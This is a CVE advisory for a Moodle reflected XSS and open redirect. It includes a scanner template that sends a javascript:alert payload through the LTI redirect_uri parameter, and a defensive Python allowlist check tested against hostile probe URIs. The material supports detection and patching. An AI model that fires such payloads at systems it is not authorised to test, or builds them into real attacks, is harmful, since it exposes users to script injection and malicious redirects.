Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6 and 3.8 to 3.8.8 contain a reflected XSS and an open redirect caused by insufficient sanitization of the redirect URI in the LTI authorization endpoint. The flaw lets an attacker execute script in a victim's browser or redirect the victim to an arbitrary site; exploitation requires the victim to open a crafted URL carrying a malicious redirect URI.
PoC code [public]
id: CVE-2021-32478

info:
  name: Moodle 3.8-3.10.3 - Reflected XSS & Open Redirect
  author: hackergautam
  severity: medium
  description: |
    Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 contain a reflected XSS and open redirect caused by insufficient sanitization of the redirect URI in the LTI authorization endpoint, letting attackers execute scripts or redirect users maliciously, exploit requires crafted URL with malicious redirect URI.
  reference:
    - https://twitter.com/JacksonHHax/status/1391367064154042377
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32478
    - https://moodle.org/mod/forum/discuss.php?d=422314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-32478
    cwe-id: CWE-79
    epss-score: 0.03754
    epss-percentile: 0.87537
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moodle
    product: moodle
  tags: cve,cve2021,moodle,xss,intrusive,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{randstr}}'
          - '<form action="javascript:alert'
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"
# digest: 490a00463044022016e3d80f4cd15322547723e49a7d5ce44069e94ac26d353b41c392b2f130a790022022a359eb574fdfe4faef845f0927c97ef0157033580f347a7fa32c10324d0b38:922c64590222798bb761d5b6d8e72950
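The root cause above is a redirect_uri that is echoed into a form action without being checked against anything. The following is an added example, not Moodle code and not part of the template, of the platform-side allowlist check that an OIDC/LTI authorization endpoint should apply: the scheme is restricted to http/https and the URI must match a URI registered for the tool. The tool hostname and registered URI are constructed sample values.

```python
"""Allowlist validation for an OIDC/LTI redirect_uri parameter (added example)."""
from typing import Iterable, Optional, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _normalise(uri: str) -> Optional[Tuple[str, str, str, str]]:
    """Split a URI into a comparable tuple, or return None if it is unusable."""
    # Reject ASCII control characters and whitespace before parsing: some
    # parsers strip them, which would turn "java\tscript:" back into "javascript:".
    if any(ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in uri):
        return None
    parts = urlsplit(uri)
    scheme = parts.scheme.lower()
    # A scheme allowlist is what stops javascript:/data: payloads; HTML-escaping
    # the value would not help in a URL context such as <form action="...">.
    if scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return None  # also rejects scheme-relative "//host/path"
    if parts.fragment or parts.username or parts.password:
        return None  # fragments and userinfo have no place in a registered redirect
    return (scheme, parts.netloc.lower(), parts.path, parts.query)


def is_registered_redirect(uri: str, registered: Iterable[str]) -> bool:
    """True only if uri exactly matches (after normalisation) a registered tool URI."""
    candidate = _normalise(uri)
    if candidate is None:
        return False
    return any(candidate == _normalise(r) for r in registered)


def choose_redirect(uri: str, registered: Iterable[str], fallback: str) -> str:
    """Return uri if registered, otherwise a platform-controlled fallback path."""
    return uri if is_registered_redirect(uri, registered) else fallback


# Constructed sample registration for a hypothetical tool.
REGISTERED = {"https://tool.example.com/lti/launch"}

if __name__ == "__main__":
    for probe in ("https://tool.example.com/lti/launch",
                  "javascript:alert('x')",
                  "java\tscript:alert(1)",
                  "https://evil.example/lti/launch",
                  "//evil.example/lti/launch"):
        print(f"{probe!r:45} -> {is_registered_redirect(probe, REGISTERED)}")
```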